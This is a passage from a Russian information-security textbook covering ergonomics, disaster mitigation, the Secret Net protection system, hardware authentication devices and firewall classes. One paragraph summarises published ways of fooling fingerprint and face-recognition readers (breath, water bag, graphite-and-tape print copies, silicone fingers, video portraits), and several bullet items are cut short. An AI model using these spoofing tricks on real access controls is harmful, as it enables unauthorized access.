дациями эргономики. Освещение рабочего места; температурно-
влажностный режим; расположение табло, индикаторов, клавиш и тум-
блеров управления; размеры и цвет элементов оборудования, помеще-
ния; положение пользователя (специалиста) относительно оборудова-
ния; использование защитных средств – все это должно обеспечивать
254
максимальную производительность человека в течение рабочего дня.
Одновременно сводится к минимуму утомляемость работника и отрица-
тельное воздействие на его здоровье неблагоприятных факторов произ-
водственного процесса. Для людей, работающих с КС, основными не-
благоприятными факторами являются: излучения мониторов, шумы
электромеханических устройств, гиподинамия, и, как правило, высокие
нагрузки на нервную систему. Вредные воздействия устройств постоян-
но уменьшаются за счет совершенствования самих устройств и в резуль-
тате использования защитных экранов. Последствия гиподинамии (ма-
лоподвижного, статического положения человека на рабочем месте) и
высокие нагрузки на нервную систему компенсируются оптимальным
режимом труда и отдыха, а также совершенствованием процесса обще-
ния человека с АС. Так при работе с ЭВМ медики рекомендуют 10-15
минутные перерывы через каждый час работы. Во время перерывов сле-
дует выполнять физические упражнения и упражнения на снятие психи-
ческих нагрузок. Продолжительность работы с использованием монито-
ра не должна превышать 6 часов за рабочий день. При сменной органи-
зации труда после 6 часов работы должен предоставляться отдых, про-
должительность которого определяется длительностью смены.
Прогресс в области электронной вычислительной техники позволил
значительно облегчить взаимодействие человека с ЭВМ. Если на заре
внедрения ЭВТ с компьютером мог работать только человек с высшим
специальным образованием, то теперь на ПЭВМ работают дети до-
школьного возраста. Дальнейшее развитие интерфейса человека с АС
идет в направлении совершенствования процессов ввода-вывода инфор-
мации и управления вычислительным процессом. Речевой ввод инфор-
мации, автоматический ввод-вывод видео- и аудиоинформации, работа с
графикой, вывод информации на экраны и табло создают новые возмож-
ности для общения человека с АС. Очень важным для обеспечения без-
опасности информации является совершенствование диалога пользова-
теля с АС. Наличие развитых систем меню, блокировок неправильных
действий, механизма напоминаний, справочных систем, систем шабло-
нов существенно снимает нагрузку на нервную систему, сокращает чис-
ло ошибок, повышает работоспособность человека и производитель-
ность системы в целом.
Одним из центральных вопросов обеспечения безопасности инфор-
мации в АС от всех классов угроз (в том числе и от преднамеренных)
является вопрос воспитания и обучения, прежде всего, обслуживающего
персонала, а также пользователей корпоративных АС. В АС общего
255
назначения работа с пользователями затруднена и сводится, главным
образом, к контролю за их деятельностью.
У обслуживающего персонала и пользователей АС необходимо
воспитывать такие качества как патриотизм (на уровне государства и на
уровне корпорации), ответственность, аккуратность и др. Чувство пат-
риотизма воспитывается у граждан страны за счет целенаправленной
политики государства и реального положения дел в стране. Успешная
политика государства внутри страны и на международной арене способ-
ствует воспитанию у граждан патриотизма, гордости за свое отечество.
Не меньшее значение, особенно для негосударственных учреждений,
имеет воспитание корпоративного патриотизма. В коллективе, где це-
нится трудолюбие, уважительное отношение друг к другу, поощряется
аккуратность, инициатива и творчество, у работника практически не бы-
вает внутренних мотивов нанесения вреда своему учреждению. Важной
задачей руководства является также подбор и расстановка кадров с уче-
том их деловых и человеческих качеств. Большой положительный опыт
воспитания корпоративного патриотизма накоплен в Японии, где очень
удачно соединяются мировой опыт управления коллективами и нацио-
нальные особенности японского народа.
Наряду с воспитанием специалистов большое значение в деле обес-
печения безопасности информации в АС имеет и обучение работников.
Дальновидный руководитель не должен жалеть средств на обучение
персонала. Обучение может быть организовано на различных уровнях.
Прежде всего, руководство должно всемерно поощрять стремление ра-
ботников к самостоятельному обучению. Важно обучать наиболее спо-
собных, трудолюбивых работников в учебных заведениях, возможно и
за счет учреждения.
Важной задачей оптимизации взаимодействия человека с АС явля-
ется также анализ этого процесса и его совершенствование. Анализ дол-
жен проводиться на всех жизненных этапах АС и направляться на выяв-
ление слабых звеньев. Слабые звенья заменяются или совершенствуются
как в процессе разработки новых АС, так и в процессе модернизации
существующих.
Минимизация ущерба от аварий и стихийных бедствий
Стихийные бедствия и аварии могут причинить огромный ущерб
объектам АС. Предотвратить стихийные бедствия человек пока не в си-
лах, но уменьшить последствия таких явлений во многих случаях удает-
ся. Минимизация последствий аварий и стихийных бедствий для объек-
тов АС может быть достигнута путем:
256
 правильного выбора места расположения объекта;
 учета возможных аварий и стихийных бедствий при разработке и
эксплуатации КС;
 организации своевременного оповещения о возможных стихийных
бедствиях;
 обучение персонала борьбе со стихийными бедствиями, авариями
и ликвидации их последствий.
Объекты АС по возможности должны располагаться в тех районах,
где не наблюдается таких стихийных бедствий как наводнения, земле-
трясения. Объекты необходимо размещать вдалеке от таких опасных
объектов как нефтебазы и нефтеперерабатывающие заводы, склады го-
рючих и взрывчатых веществ, плотин и т. д.
На практике далеко не всегда удается расположить объект вдалеке
от опасных предприятий или районов с возможными стихийными бед-
ствиями. Поэтому при разработке, создании и эксплуатации объектов
АС необходимо предусмотреть специальные меры. В районах с возмож-
ными землетрясениями здания должны быть сейсмостойкими. В районах
возможных затоплений основное оборудование целесообразно разме-
щать на верхних этажах зданий. Все объекты должны снабжаться авто-
матическими системами тушения пожара. На объектах, для которых ве-
роятность стихийных бедствий высока, необходимо осуществлять рас-
пределенное дублирование информации и перераспределение функций
объектов. На всех объектах должны предусматриваться меры на случай
аварии в системах электропитания. Для объектов, работающих с ценной
информацией, требуется иметь аварийные источники бесперебойного
питания и подвод электроэнергии производить не менее чем от двух не-
зависимых линий электропередач. Использование источников беспере-
бойного питания обеспечивает, по крайней мере, успешное завершение
вычислительного процесса и сохранение данных на внешних запомина-
ющих устройствах. Для малых АС такие источники способны обеспе-
чить работу в течение нескольких часов.
Потери информационных ресурсов могут быть существенно
уменьшены, если обслуживающий персонал будет своевременно преду-
прежден о надвигающихся природных катаклизмах. В реальных услови-
ях такая информация часто не успевает дойти до исполнителей. Поэтому
персонал должен быть обучен действиям в условиях стихийных бед-
ствий и аварий, а также уметь восстанавливать утраченную информа-
цию.
257
5.3. Программно-аппаратные системы защиты
Рассмотрим программно-аппаратные системы защиты на примере
системы защиты Secret Net. Система защиты Secret Net, предназначена
для защиты хранимой и обрабатываемой информации на персональных
компьютерах, функционирующих на платформах операционных систем
MS Windows 2000/XP/2003 от НСД и противодействия попыткам нару-
шения нормального функционирования в одноранговой сети или в сети с
доменной организацией и прикладных систем на ее основе.
Система Secret Net не подменяет стандартные защитные механиз-
мы, предоставляемые ОС Windows, и не ограничивает возможность их
использования, а расширяет их за счет дополнительных программных и
аппаратных средств.
Таким образом, защитные средства компьютера складываются из 3
компонентов:
1. Средства безопасности ОС Windows.
2. Программные средства Secret Net.
3. Аппаратные средства Secret Net.
Автономный вариант системы защиты Secret Net предназначен для
защиты ресурсов рабочей станции локальной сети или неподключенного
к сети компьютера.
Система Secret Net дополняет стандартные защитные механизмы
ОС MS Windows 2000/XP/2003 функциями, обеспечивающими:
 ификацию пользователей при помощи специальных аппа-
ратных средств (iButton, eToken, Smart Card, Smarty).
 е-
нию доступом, реализованному в ОС MS Windows 2000/XP/2003,
полномочное (мандатное) управление доступом пользователей к
конфиденциальной информации на локальных и подключенных
сетевых дисках.

регистрации событий, связанных с безопасностью ИС. Удобные
средства просмотра и представления зарегистрированной инфор-
мации.
 елями
и операционной системой.
 о-
граммной среды (списка разрешенных и запрещенных для запуска
программ).
258
 ения объектами благодаря использованию ме-
ханизма шаблонов настроек.
Система Secret Net дополняет операционную систему Windows ря-
дом защитных средств, которые можно отнести к следующим группам:
1.Средства защиты от несанкционированного входа в систему:
 Механизм идентификации и аутентификации пользователей (в том
числе с помощью аппаратных средств).
 Функция временной блокировки компьютера на время паузы в ра-
боте пользователя, предотвращающая доступ к компьютеру посто-
ронних лиц.
 Аппаратные средства защиты от загрузки ОС с гибкого диска.
2.
 Разграничение доступа пользователей к ресурсам компьютера с
использованием механизмов избирательного и полномочного
 Создание для любого пользователя замкнутой программной среды
(списка разрешенных для запуска программ).
 Функция затирания удаленных данных на локальных дисках.
3. Средства регистрации и оперативного контроля:
 Политика регистрации, ведение журнала регистрации событий,
имеющих отношение к безопасности системы. Работа с журналом
безопасности, управление временем хранения и удалением запи-
сей.
 Контроль целостности файлов, ключей реестра и т.д. Управление
расписанием контроля и выбор реакции на нарушение целостно-
сти.
 Контроль аппаратной конфигурации компьютера.
Отличительной особенностью системы Secret Net является возмож-
ность гибкого управления набором защитных средств системы. Пользо-
ватель, имеющий привилегии на администрирование системы, может
активировать различные комбинации защитных механизмов системы,
выбирая из них только необходимые и устанавливая соответствующие
режимы их работы.
В системе Secret Net поддерживается работа значительного числа
аппаратных средств, каждое из которых выполняет определённые зада-
чи. В общем случае, средства аппаратной поддержки Secret Net обеспе-
чивают (см. табл. 9):
259
 - ре-
ализация механизма идентификации и аутентификации, блокиров-
ка загрузки ОС со съёмных носителей и т.д.;
 - контроль целостности
программной среды, ведение журнала регистрации событий;

Таблица 9
Функции средств аппаратной поддержки
Функция устройства Способы защиты

1. Защита от НСД к ин- - реализация механизма идентификации
формационным ресурсам и аутентификации;
компьютеров - блокировка загрузки ОС со съёмных
носителей и т.д.
2. Оперативный контроль и - контроль целостности программной
регистрация среды;
- ведение журнала регистрации событий;
3. Хранение ключевой ин- - запись ключевой информации на энер-
формации гонезависимый отчуждаемый носитель
5.4. Аппаратно-программные средства контроля до-

ступа
Доступ пользователя к информационным ресурсам компьютера
осуществляется при успешном выполнении операций идентификации и
аутентификации. Идентификация заключается в распознавании субъекта
(объекта) по присущему или присвоенному ему идентификационному
признаку. Проверка принадлежности субъекту (объекту) доступа предъ-
явленного им идентификатора (подтверждение подлинности) осуществ-
ляется в процессе аутентификации. В системах контроля и управления
доступом широко используются аппаратные средства идентификации и
аутентификации, называемые устройствами ввода идентификационных
признаков (УВИП) [29].
В состав аппаратных средств УВИП входят идентификаторы и счи-
тывающие устройства (иногда считыватели могут отсутствовать). Со-
временные УВИП принято классифицировать по виду идентификацион-
ных признаков и по способу их считывания (см. рис. 44).
260
УВиП
По способу считывания По виду идентификационных признаков

идентификационных признаков
Комбини Биометриче Комбиниро

Контактные Бесконтактные Электронные
рованные ские ванные
Рис. 44. Классификация УВИП

По способу считывания они подразделяются на контактные, ди-
станционные (бесконтактные) и комбинированные.
Контактное считывание идентификационных признаков предпола-
гает непосредственное взаимодействие идентификатора и считывателя
— проведение идентификатора через считыватель или их простое со-
прикосновение.
Бесконтактный (дистанционный) способ считывания не требует
четкого позиционирования идентификатора и считывателя. Для чтения
данных нужно либо на определенное расстояние поднести идентифика-
тор к считывателю (радиочастотный метод), либо оказаться с ним в поле
сканирования считывающего устройства (инфракрасный метод).
Комбинированный способ подразумевает сочетание обоих методов
считывания.
По виду используемых идентификационных признаков УВИП мо-
гут быть электронными, биометрическими и комбинированными.
В электронных УВИП идентификационные признаки представля-
ются в виде кода, записанного в электронную микросхему памяти иден-
тификатора.
В биометрических устройствах идентификационными признаками
являются индивидуальные физические признаки человека (отпечатки
пальцев, геометрия ладони, рисунок сетчатки глаза, голос, динамика
подписи и т. д.).
В комбинированных УВИП для идентификации используется не-
сколько идентификационных признаков одновременно.
iButton (Touch Memory)
261
Широкое внедрение систем контроля и управления доступом к ин-
формационным ресурсам компьютеров в производстве, финансовой об-
ласти, торговле, социальной сфере потребовало создания надёжных и
относительно дешёвых УВИП. К таким средствам можно с полным ос-
нованием отнести идентификатор iButton (Touch Memory) американской
компании Dallas Semiconductor. В дальнейшем в тексте используется
прежнее название – идентификатор Touch Memory.
Модельный ряд идентификаторов iButton довольно широк и разно-
образен (более 20 моделей). Идентификаторы Touch Memory семейства
DS199X представляют собой микросхему, вмонтированную в герметич-
ный корпус, выполненный из нержавеющей стали (см. рис. 45). Корпус
отдаленно напоминает батарейку для наручных часов и имеет диаметр
17,35 мм при высоте 5,89 мм (корпус F5) или 3,1 мм (корпус F3). Обмен
с внешними устройствами происходит по двухпроводному интерфейсу с
использованием широтно-импульсной модуляции. Контактами служит
сам корпус прибора, гарантированное количество контактов составляет
несколько миллионов. Корпус выполняет также защитные функции от
различных внешних воздействий и обеспечивает высокую живучесть
прибора в условиях агрессивных сред, пыли, влаги, внешних электро-
магнитных полей, механических ударов и т.п.
Обмен данными с компьюте-
ром осуществляется по двухпровод-
ной шине посредством контактного
устройства Touch Probe. Для этого
необходимо прикоснуться иденти-
фикатором к контактному устрой-
ству. Время контакта - не более 5
мс.
В системах защиты от НСД ис-
пользуются несколько модификаций
Рис. 45. Идентификатор идентификаторов семейства
Touch Memory DS199X (см. табл. 10), которые от-
личаются ёмкостью памяти, функ-
циональными возможностями и, соответственно, ценой.
Таблица 10
Идентификаторы Touch Memory
262
Тип Емкость Емкость Емкость Защита Конструкция
изделия постоянной блокнотной оперативной доступа к корпуса
памяти, бит памяти, бит памяти, бит памяти
DS 1990A 64 - - - F3/F5
DS 1991L 64 512 0,5 + F5
DS 1992L 64 256 1 - F5
DS 1993L 64 256 4 - F5
DS 1994L 64 256 4 - F5
DS 1995L 64 256 16 - F5
DS 1996L 64 256 64 - F5
В структуре Touch Memory можно выделить следующие основные
части: постоянное запоминающее устройство (ПЗУ или ROM), блокнот-
ную память, оперативное запоминающее устройство (ОЗУ или RAM),
часы реального времени (для DS1994), а также элемент питания - встро-
енную миниатюрную литиевую батарейку (кроме DS1990A).
В ПЗУ хранится 64-разрядный код, состоящий из 8-разрядного кода
типа идентификатора, 48-разрядного уникального серийного номера и 8-
разрядной контрольной суммы. Блокнотная память (вариант буферной
памяти) служит для предотвращения записи новых данных на место
имеющихся или записи по неверному адресу.
К достоинствам УВИП на базе идентификаторов Touch Memory от-
носятся:
 долговечность (время хранения информации в памяти идентифи-
катора составляет не менее 10 лет);
 высокая степень механической и электромагнитной защищённо-
сти;
 малые размеры, удобство хранения;
 относительно невысокая стоимость.
Недостатком устройства является зависимость его срабатывания от
точности соприкосновения идентификатора и считывателя, выполняемо-
го пользователем.
Smart Card
В системах разграничения доступа широкое применение находят
УВИП на базе идентификаторов, называемых смарт-картами (от англ.
Smart Card – интеллектуальная карта). Устройства ввода идентификаци-
онных признаков на базе смарт-карт относятся к классу электронных
устройств. Они могут быть контактными и бесконтактными (дистанци-
онными).
Основой внутренней организации смарт-карты является так называ-
емая SPOM-архитектура (Self Programming One-chip Memory), преду-
263
сматривающая наличие центрального процессора (CPU), ОЗУ, ПЗУ и
электрически перепрограммируемой постоянной памяти EEPROM (см.
рис. 46). Как правило, в карте также присутствует специализированный
сопроцессор.
Рис. 46. Структура контактной смарт-карты

Процессор обеспечивает разграничение доступа к хранящейся в па-
мяти информации, обработку данных и реализацию криптографических
алгоритмов (совместно с сопроцессором). В ПЗУ хранится исполняемый
код процессора, оперативная память используется в качестве рабочей,
EEPROM необходима для хранения изменяемых данных владельца кар-
ты.
В структуру бесконтактных смарт-карт на базе стандарта MIFARE 1
S50 IC (или MIFARE Standard) дополнительно входит радиочастотный
модуль со встроенной антенной, необходимой для связи со считывате-
лем и питания микросхемы. Смарт-карта является пассивной, расстояние
считывания составляет не более 10 см. Обмен информацией осуществ-
ляется на частоте 13,56 МГц с максимальной скоростью 106 кбит/с.
Каждая смарт-карта обладает собственным уникальным серийным
номером. Он задается на заводе-изготовителе, его нельзя изменить на
протяжении всего срока эксплуатации карты. Идентификация по серий-
ному номеру, шифрование данных и аутентификация областей памяти с
помощью секретных ключей обеспечивают надежную защиту смарт-
карт от взлома.
По отношению к компьютеру устройства чтения смарт-карт могут
быть внешними и внутренними (например, встроенными в клавиатуру,
гнездо 3,5"-дисковода, корпус компьютера). Считыватель работает под
управлением специальной программы — драйвера устройства чтения.
На базе ISO 7816 разработан единый стандартный интерфейс для
работы со смарт-картами. Включенные в него спецификации PC/SC об-
легчают интеграцию смарт-карт-технологий в программно-аппаратные
264
комплексы на базе платформы персонального компьютера и создание
средств разработки приложений для смарт-карт.
На мировом рынке компьютерной безопасности разработкой смарт-
карт-технологий занимаются многие фирмы, среди которых выделяются
Bull, GemPlus, HID, Schlumberger, а также альянс Fujitsu Siemens
Computers. На отечественном рынке ведущее место занимает ОАО
«Ангстрем», разработавшее первую российскую смарт-карту в 1996 г.
Несомненными достоинствами УВИП на базе смарт-карт счита-
ются удобство хранения идентификатора (например, его можно держать
в бумажнике вместе с другими карточками) и считывания идентифика-
ционных признаков. К недостаткам можно отнести ограниченный срок
эксплуатации из-за неустойчивости смарт-карты к механическим повре-
ждениям и высокую стоимость считывателей смарт-карт.
Так, например, в состав комплекса ASE Developer's Kit компании
Aladdin Knowledge Systems входят: ASECards – набор смарт-карт,
ASEDrive – считыватели для смарт-карт, ASESoft – программное обес-
печение. На рис. 47 показан внешний вид считывателя ASEDrive с по-
мещённой в него смарт-картой.
К достоинствам УВИП на базе смарт-
карт относят:
 удобство хранения идентификатора
(например, в бумажнике среди других
карточек) и считывания идентифика-
ционных признаков;
 возможность обмена данными с ком-
Рис. 47. Считыва- пьютером через различные устройства

тель смарт-карт ввода-вывода (клавиатурный порт
ASEDrive PS/2, последовательный порт, свобод-
ный слот расширения, параллельный
порт, интерфейс SCSI, в ближайшей перспективе порт универ-
сальной, последовательной шины USB).
К недостаткам следует отнести ограниченный срок эксплуатации
смарт-карт из-за неустойчивости к механическим повреждениям, высо-
кую стоимость считывателей смарт-карт.
Устройства ввода на базе USB-ключей (eToken)

В последнее время широкое применение находят УВИП, не требу-
ющие наличия аппаратных считывателей. К таким устройствам относят
265
так называемые USB-ключи, которые подключаются к USB-порту непо-
средственно или с помощью соединительного кабеля.
Конструктивно USB-ключи выпускаются в виде брелоков (см. рис.
48), которые легко размещаются на связке с обычными ключами. Брело-
ки выпускаются в цветных корпусах и снабжаются световыми индика-
торами работы. Каждый идентификатор имеет собственный уникальный
серийный номер. Основными компонентами USB-ключей являются
встроенные процессор и память. Процессор выполняет функции крипто-
графического преобразования информации и USB-контроллера. Память
предназначается для безопасного хранения ключей шифрования, цифро-
вых сертификатов и любой другой важной информации. Поддержка
спецификаций PC/SC позволяет без труда переходить от смарт-карт к
USB-ключам и встраивать их как в существующие приложения, так и в
новые.
Рис. 48. Идентификатор eToken R2

На российском рынке наибольшей популярностью пользуются сле-
дующие USBключи: iKey 1000, iKey 2000 фирмы Rainbow Technologies,
eToken R2, eToken Pro компании ALADDIN Software Security R.D,
WebIdentity фирмы Eutron. В табл. 11 представлены характеристики не-
которых модификаций USB-ключей.
266
Таблица 11
Характеристики USB-ключей
Емкость Разрядность се-
Изделие Алгоритмы шифрования
памяти, Кб рийного номера
eToken R2 16/32/64 32 DESK (ключ 120 бит), MD5
RS&1024, DES, 3DES (TripleDES),
eToken Pro 16/32 32
SHA-1
DES (режимы ECB и CBC), DES,
iKey 10хх 8/32 64
3DES, RC2, RC4, RC5, MD5
DES (режимы ECB и CBC), DESX,
iKey 20xx 8/32 64
3DES, RC2, RC4, RC5, RSA/1024
ePasslOOO 8/32 64 MD5, MD5-HMAC
ePass2000 16/32 64 RSA, DES, 3DES, DSA, MD5, SHA-1
Webldentity 16/32 32 3DES,MD5
Crypioldentity 32 32 RSA/1024
Основное назначение персональных идентификаторов eToken R2
является осуществление идентификации пользователей и безопасное
хранение ключей шифрования, цифровых сертификатов, любой другой
важной информации.
Закрытая информация хранится в защищенной памяти брелка ёмко-
стью от 16 до 64 Кбайт. Каждый идентификатор имеет уникальный се-
рийный 32-разрядный номер. При обмене информацией между eToken
R2 и компьютером используется шифрование данных. Поддержка спе-
цификаций PC/SC позволяет без труда переходить от смарт-карт к иден-
тификаторам eToken.
Достоинствами USB-ключей являются:
 малые размеры, удобство хранения;
 отсутствие аппаратного считывателя;
 простота подсоединения к USB-порту.
К недостаткам USB-ключей можно отнести их относительно высо-
кую стоимость и малое время эксплуатации, ограниченное слабой меха-
нической защищённостью брелка.
Proximity
Широко распространённые радиочастотные идентификаторы
Proximity (от англ. proximity – близость, соседство) конструктивно вы-
пускаются в виде карточек, брелоков, браслетов, ключей и т.п. Они
имеют встроенные антенну, приёмо-передатчик и память.
Внутри идентификатора Proximity также может находиться химиче-
ский источник питания - литиевая батарея. Идентификаторы с батареей
267
называются активными. Они обеспечивают взаимодействие со считыва-
телем на значительном расстоянии (единицы метров). Идентификаторы
без батареи называются пассивными. Дистанция считывания составляет
десятки сантиметров.
Считыватель Proximity постоянно излучает радиосигнал низкой
мощности, который питает идентификатор. Когда он оказывается на
определенном расстоянии от считывателя, сигнал поглощается располо-
женной внутри нее антенной и данная энергия питает микросхему, так-
же расположенный внутри карточки. После получения энергии карта из-
лучает идентификационные данные, принимаемые считывателем. Ди-
станция считывания в значительной степени зависит от характеристик
антенного и приёмо-передающего трактов считывателя. Весь процесс
занимает несколько десятков микросекунд.
Устройство чтения может быть помещено внутрь корпуса компью-
тера. Взаимная ориентация идентификатора и считывателя не имеет зна-
чения, а ключи или другие предметы, находящиеся в контакте с картой,
не мешают передаче информации.
В соответствии с используемой несущей частотой RFID-системы
классифицируются по частоте:
низкочастотные (100—500 кГц) характеризуются незначительным
расстоянием считывания (десятки сантиметров). Идентификационный
код считывается через одежду, сумки, портмоне и т. п.;
устройства промежуточной частоты (10—15 МГц) способны пере-
давать значительные объемы данных;
высокочастотные (850—950 МГц или 2,4—5 ГГц) характеризуются
большой дистанцией считывания (в несколько метров).
В мире насчитывается большое число производителей идентифика-
торов и считывателей Proximity, основными из которых являются фирмы
HID (Hughes Identification Devices), Motorola Indala, Texas Instruments.
Среди отечественных предприятий можно отметить НПФ "Сигма", ОАО
"Ангстрем", PERCo, ARSEC и ряд других.
Основными достоинствами УВИП Proximity являются:
 ь пассивных идентификаторов (некоторые произ-
водители дают на карты пожизненную гарантию);
 и-
фикатора и считывателя, удобство считывания идентификацион-
ных признаков.
К недостаткам можно отнести слабую электромагнитную защищён-
ность, относительно высокую стоимость.
268
Рассмотренные выше контактные и бесконтактные УВИП обеспе-
чивают важнейший механизм защиты – идентификацию и аутентифика-
цию пользователей.
Биометрические устройства ввода

Биометрические УВИП относятся к классу электронных устройств,
и могут быть контактными и бесконтактными (дистанционными).
В основе биометрической идентификации и аутентификации лежит
считывание и сравнение предъявляемого биометрического признака
пользователя с имеющимся эталоном. Такого рода признаки включают в
себя отпечатки пальцев, форму и термограмму лица, рисунок сетчатки и
радужной оболочки глаза, геометрию руки, узор, образуемый кровенос-
ными сосудами ладони человека, речь и т. д. Высокий уровень защиты
определяется тем, что биометрия позволяет идентифицировать человека,
а не устройство.
До недавнего времени широкое использование биометрических
УВИП в средствах контроля доступа к компьютерам тормозилось их вы-
сокой ценой. Успехи в технологиях, теории распознавания и микроэлек-
тронике позволили разработчикам снизить стоимость устройств и тем
самым активизировать рынок.
Особенно эта тенденция характерна для устройств дактилоскопиче-
ского доступа. Отпечаток пальца считается одним из наиболее устойчи-
вых идентификационных признаков (не изменяется со временем, при
повреждении кожного покрова идентичный папиллярный узор полно-
стью восстанавливается, при сканировании не вызывает дискомфорта у
пользователя). Согласно отчету International Biometric Group (доля
устройств дактилоскопического доступа в последние годы составила
52,1% мирового биометрического рынка.
Считыватели (или сканеры) отпечатков пальцев представляют со-
бой подключаемые к одному из портов компьютера отдельные устрой-
ства либо они встраиваются в компьютерные мыши, клавиатуры, корпу-
са мониторов. Наибольшее распространение получили дактилоскопиче-
ские мыши.
Среди устройств дактилоскопического доступа в России наиболее
широко представлены мыши Eyed Mouse и Optical Eyed Mouse компании
SecuGen, U-Match Mouse фирмы Biolink Technologies International, ID
Mouse корпорации Siemens AG и некоторые другие.
Несмотря на тенденцию снижения цены и заявляемые разработчи-
ками отменные характеристики устройств, ряд экспертов подвергают
269
сомнению высокую эффективность потребительских биометрических
УВИП. Так, ранее была опубликована статья, авторам которой с помо-
щью тривиальных способов удалось обмануть 11 биометрических си-
стем известных компаний, использующих в качестве идентификацион-
ных признаков отпечатки пальцев, лицо и радужную оболочку глаза.
Как отмечается в публикации, для обмана УВИП на основе емкост-
ных сенсоров, обладающих эффектом «последействия», достаточно по-
дышать на сенсор или приложить к нему наполненный водой полиэти-
леновый пакет. В этом случае восстанавливается отпечаток пальца,
оставленный зарегистрированным пользователем. Есть и более эффек-
тивный способ, применимый не только к емкостным сенсорам, — взять
отпечаток пальца, оставленного пользователем на какой-нибудь поверх-
ности, и скопировать его с помощью графитовой пудры и липкой ленты.
Кроме того, искусственный силиконовый палец позволил одурачить
шесть дактилоскопических сканеров, система распознавания по чертам
лица была обманута путем демонстрации на мониторе ноутбука виде-
опортрета ранее зарегистрированного пользователя и т. д.
Комбинированные устройства ввода

Эффективность защиты компьютеров от НСД может быть повыше-
на за счет комбинирования различных УВИП. Эта тенденция наглядно
просматривается в изделиях ведущих мировых компаний.
Корпорация HID разработала карты-идентификаторы, объединяю-
щие в себе различные технологии считывания идентификационных при-
знаков. Например, в устройстве Smart ISOProx II сочетаются Proximity
125 кГц и контактная смарт-карт-технология MIFARE 13,56 МГц, в HID
MIFARE Card — контактные и бесконтактные смарт-карт-технологии. В
идентификаторе HID Proximity and MIFARE Card собран букет из трех
технологий: Proximity 125 кГц, MIFARE 13,56 МГц и контактная смарт-
карта.
Альянс Fujitsu Siemens Computers предлагает комбинированное
УВИП под названием KBPC-CID. Данное изделие представляет собой
объединенные встроенные в клавиатуру компьютера считыватель для
смарт-карт и дактилоскопический сканер. Клавиатура подключается к
USB-порту защищаемого компьютера.
В компании Siemens найдено решение, позволяющее хранить в
смарт-карте три биометрических идентификационных признака пользо-
вателя: отпечаток пальца, черты лица и голос. Представляется интерес-
ным желание объединить USB-ключ с биометрической системой иден-
270
тификации. Подобное предложение поступило от компании Trekstor,
выпустившей изделие ThumbDrive Touch. Основными компонентами
устройства, выполненного в виде USB-брелока, являются дактилоскопи-
ческий сканер и энергонезависимая флэш-память емкостью от 32 до 512
Мб. В памяти выделяются открытая и защищенная области. Пользова-
тель получает доступ к защищенной области памяти после проверки от-
печатков пальцев. Скорость чтения и записи данных составляет 500 и
250 Кб/с соответственно.
При выборе того или иного комбинированного УВИП следует не
забывать известную пословицу: «Где тонко, там и рвется», — что в пе-
реводе на язык теории систем означает: эффективность системы опреде-
ляется эффективностью самого слабого звена.
Электронные замки
Свои основные функции многие изделия аппаратной поддержки ре-
ализуют до загрузки операционной системы компьютера. Для этого в
составе каждого средства имеется собственная память EEPROM, содер-
жимое которой дополняет базовую систему ввода-вывода BIOS компью-
тера. При включении компьютера выполняется копирование содержимо-
го EEPROM BIOS аппаратного средства в так называемую теневую об-
ласть (Shadow Memory) оперативной памяти, с которой и ведется даль-
нейшая работа. Поэтому не допускается использование системной BIOS
режима Shadow Memory для адресного пространства, в котором разме-
щается расширение BIOS, содержащееся в EEPROM изделий.
5.5. Межсетевые экраны

В РД ФСТЭК России "Средства вычислительной техники. Межсе-
тевые экраны. Защита от несанкционированного доступа к информации.
Показатели защищенности от несанкционированного доступа к инфор-
мации" межсетевой экран (МЭ) определяется как локальное (одноком-
понентное) или функционально-распределенное программное (програм-
мно-аппаратное) средство (комплекс), реализующее контроль за инфор-
мацией, поступающей в автоматизированную систему (АС) и /или выхо-
дящей из АС. МЭ обеспечивает защиту АС посредством фильтрации
информации (как минимум на сетевом уровне), то есть ее анализа по со-
вокупности критериев и принятия решения о ее распространении на ос-
нове заданных правил, проводя таким образом разграничение доступа
субъектов из одной АС к объектам другой АС. Каждое правило запре-
271
щает или разрешает передачу информации определенного вида между
субъектами и объектами. Как следствие, субъекты из одной АС получа-
ют доступ только к разрешенным информационным объектам из другой
АС. Интерпретация набора правил выполняется последовательностью
фильтров, которые разрешают или запрещают передачи данных (паке-
тов) на следующий фильтр или уровень протокола.
Выделяются пять классов МЭ, где пятый - низший, а первый - выс-
ший. Как минимум, классифицируемый экран должен фильтровать по-
токи данных на сетевом уровне. При умеренных требованиях по защите
информации можно ограничится МЭ пятого или четвертого классов, ре-
ализованных в виде маршрутизаторов с включенными средствами филь-
трации (экранирующих маршрутизаторов).
Чем выше уровень эталонной модели, на котором функционирует
МЭ, тем более содержательной информацией он обладает, тем выше
степень защиты, который МЭ может обеспечить. МЭ третьего класса и
выше должны фильтровать потоки данных не только на сетевом, но и на
транспортном и прикладном уровнях, при этом требования РД можно
удовлетворить следующими способами:
 - использовать составную конфигурацию (экранирующий марш-
рутизатор + прикладной экран) - эшелонированность обороны;
 - использовать комплексный экран (фильтрация потоков данных
на уровнях с сетевого по прикладной) - сочетание надежности
фильтрации с прозрачностью для приложений.
В настоящее время известные МЭ можно разделить на несколько
основных групп (рис. 49).
272
Основные группы МЭ
По исполнению:
1. Аппаратно-программные;
2. Программные.
По функционированию на уровнях мо-

дели OSI:
1. Шлюз экспертного уровня;
2. Экранирующий (прикладной) шлюз;
3. Экранирующий транспорт (шлюз сеансо-
вого уровня);
4. Экранирующий маршрутизатор (пакет-
ный фильтр).
По используемой технологии:
1. Statefull inspection (контроль состояния
протокола);
2. На основе модулей-посредников (proxy).
По схеме подключения:
1. Схема единой защиты сети;
2. Схема с защищаемым закрытым и не
защищаемыми открытыми сегментами
сети;
3. Схема с разделенной защитой закрытого и
открытого сегментов сети.
Рис. 49.Основные группы МЭ

Качественно защищенная от НСД сеть должна содержать средства
защиты точек входа со стороны Internet, средства, обеспечивающие без-
опасность корпоративных серверов, фрагментов локальной сети и от-
дельных компьютеров. Наиболее подходящим решением является раз-
мещение средств безопасности на одной платформе с сервером, который
они будут защищать, то есть применение персональных межсетевых
экранов. Данное решение существенно дополняет функциональные воз-
можности традиционных периметровых экранов, обеспечивающих один
слой защиты для всей сети, и может использоваться для защиты как
внутренних, так и Internet-серверов.
273
Распределенные персональные экраны обладают следующими
преимуществами:
 - функционируют на уровне ядра ОС и надежно защищают серве-
ры, проверяя все входящие и исходящие пакеты;
 - позволяют наращивать серверные парки без ущерба для приня-
той политики безопасности;
 - стоят в 5-10 раз дешевле традиционных экранов.
Для обеспечения контроля доступа к определенным массивам ин-
формации во многих точках Intranet-сети наиболее целесообразно при-
менять так называемые аппаратные МЭ, через которые проходят все
коммуникации. Информационный поток между корпоративной сетью и
